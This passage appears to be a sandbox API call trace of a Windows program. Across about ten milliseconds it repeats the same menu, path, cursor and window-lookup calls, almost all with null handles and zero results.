GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.631] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.631] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.631] GetStockObject (i=6) returned 0x1b00018 [0027.631] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.631] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.631] PathFileExistsW (pszPath=0x0) returned 0 [0027.631] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.631] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.631] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.631] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.631] GetMenu (hWnd=0x0) returned 0x0 [0027.631] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.631] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.631] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.631] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.631] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.631] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.631] GetStockObject (i=6) returned 0x1b00018 [0027.631] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.631] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.632] PathFileExistsW (pszPath=0x0) returned 0 [0027.632] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.632] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.632] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.632] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.632] GetMenu (hWnd=0x0) returned 0x0 [0027.632] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.632] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.632] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.632] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.632] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.632] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.632] GetStockObject (i=6) returned 0x1b00018 [0027.632] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.632] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.632] PathFileExistsW (pszPath=0x0) returned 0 [0027.632] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.632] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.632] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.632] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.632] GetMenu (hWnd=0x0) returned 0x0 [0027.632] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.632] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.632] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.632] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.632] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.632] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.632] GetStockObject (i=6) returned 0x1b00018 [0027.632] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.632] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.632] PathFileExistsW (pszPath=0x0) returned 0 [0027.632] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.632] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.633] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.633] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.633] GetMenu (hWnd=0x0) returned 0x0 [0027.633] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.633] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.633] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.633] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.633] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.633] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.633] GetStockObject (i=6) returned 0x1b00018 [0027.633] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.633] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.633] PathFileExistsW (pszPath=0x0) returned 0 [0027.633] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.633] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.633] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.633] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.633] GetMenu (hWnd=0x0) returned 0x0 [0027.633] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x390) returned -1 [0027.633] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.633] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.633] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.633] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.633] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.633] GetStockObject (i=6) returned 0x1b00018 [0027.633] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.633] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.633] PathFileExistsW (pszPath=0x0) returned 0 [0027.633] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.633] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.633] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.633] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.633] GetMenu (hWnd=0x0) returned 0x0 [0027.634] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.634] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.634] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.634] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.634] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.634] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.634] GetStockObject (i=6) returned 0x1b00018 [0027.634] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.634] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.634] PathFileExistsW (pszPath=0x0) returned 0 [0027.634] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.634] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.634] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.634] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.634] GetMenu (hWnd=0x0) returned 0x0 [0027.634] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.634] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.634] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.634] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.634] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.634] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.634] GetStockObject (i=6) returned 0x1b00018 [0027.634] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.634] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.634] PathFileExistsW (pszPath=0x0) returned 0 [0027.634] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.634] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.634] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.634] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.634] GetMenu (hWnd=0x0) returned 0x0 [0027.634] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.634] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.634] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.634] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.635] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.635] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.635] GetStockObject (i=6) returned 0x1b00018 [0027.635] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.635] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.635] PathFileExistsW (pszPath=0x0) returned 0 [0027.635] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.635] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.635] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.635] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.635] GetMenu (hWnd=0x0) returned 0x0 [0027.635] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.635] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.635] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.635] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.635] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.635] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.635] GetStockObject (i=6) returned 0x1b00018 [0027.635] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.635] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.635] PathFileExistsW (pszPath=0x0) returned 0 [0027.635] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.635] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.635] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.635] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.635] GetMenu (hWnd=0x0) returned 0x0 [0027.635] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3c4) returned -1 [0027.635] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.635] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.635] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.635] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.635] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.635] GetStockObject (i=6) returned 0x1b00018 [0027.635] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.636] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.636] PathFileExistsW (pszPath=0x0) returned 0 [0027.636] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.636] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.636] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.636] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.636] GetMenu (hWnd=0x0) returned 0x0 [0027.636] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.636] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.636] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.636] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.636] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.636] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.636] GetStockObject (i=6) returned 0x1b00018 [0027.636] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.636] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.636] PathFileExistsW (pszPath=0x0) returned 0 [0027.636] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.636] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.636] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.636] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.636] GetMenu (hWnd=0x0) returned 0x0 [0027.636] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.636] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.636] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.637] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.637] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.637] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.637] GetStockObject (i=6) returned 0x1b00018 [0027.637] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.637] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.637] PathFileExistsW (pszPath=0x0) returned 0 [0027.637] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.637] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.637] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.637] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.637] GetMenu (hWnd=0x0) returned 0x0 [0027.637] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.637] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.637] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.637] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.637] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.637] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.637] GetStockObject (i=6) returned 0x1b00018 [0027.637] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.637] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.637] PathFileExistsW (pszPath=0x0) returned 0 [0027.637] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.637] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.637] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.637] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.637] GetMenu (hWnd=0x0) returned 0x0 [0027.637] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.637] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.637] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.637] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.637] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.638] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.638] GetStockObject (i=6) returned 0x1b00018 [0027.638] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.638] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.638] PathFileExistsW (pszPath=0x0) returned 0 [0027.638] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.638] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.638] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.638] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.638] GetMenu (hWnd=0x0) returned 0x0 [0027.638] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4cf) returned -1 [0027.638] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.638] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.638] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.638] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.638] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.638] GetStockObject (i=6) returned 0x1b00018 [0027.638] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.638] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.638] PathFileExistsW (pszPath=0x0) returned 0 [0027.638] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.638] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.638] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.638] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.638] GetMenu (hWnd=0x0) returned 0x0 [0027.638] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.638] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.638] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.638] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.638] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.638] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.638] GetStockObject (i=6) returned 0x1b00018 [0027.638] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.638] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.639] PathFileExistsW (pszPath=0x0) returned 0 [0027.639] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.639] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.639] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.639] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.639] GetMenu (hWnd=0x0) returned 0x0 [0027.639] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.639] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.639] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.639] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.639] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.639] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.639] GetStockObject (i=6) returned 0x1b00018 [0027.639] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.639] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.639] PathFileExistsW (pszPath=0x0) returned 0 [0027.639] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.639] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.639] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.639] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.639] GetMenu (hWnd=0x0) returned 0x0 [0027.639] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.639] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.639] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.639] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.639] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.639] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.639] GetStockObject (i=6) returned 0x1b00018 [0027.639] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.639] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.639] PathFileExistsW (pszPath=0x0) returned 0 [0027.639] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.639] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.639] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.640] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.640] GetMenu (hWnd=0x0) returned 0x0 [0027.640] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.640] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.640] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.640] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.640] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.640] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.640] GetStockObject (i=6) returned 0x1b00018 [0027.640] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.640] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.640] PathFileExistsW (pszPath=0x0) returned 0 [0027.640] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.640] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.640] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.640] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.640] GetMenu (hWnd=0x0) returned 0x0 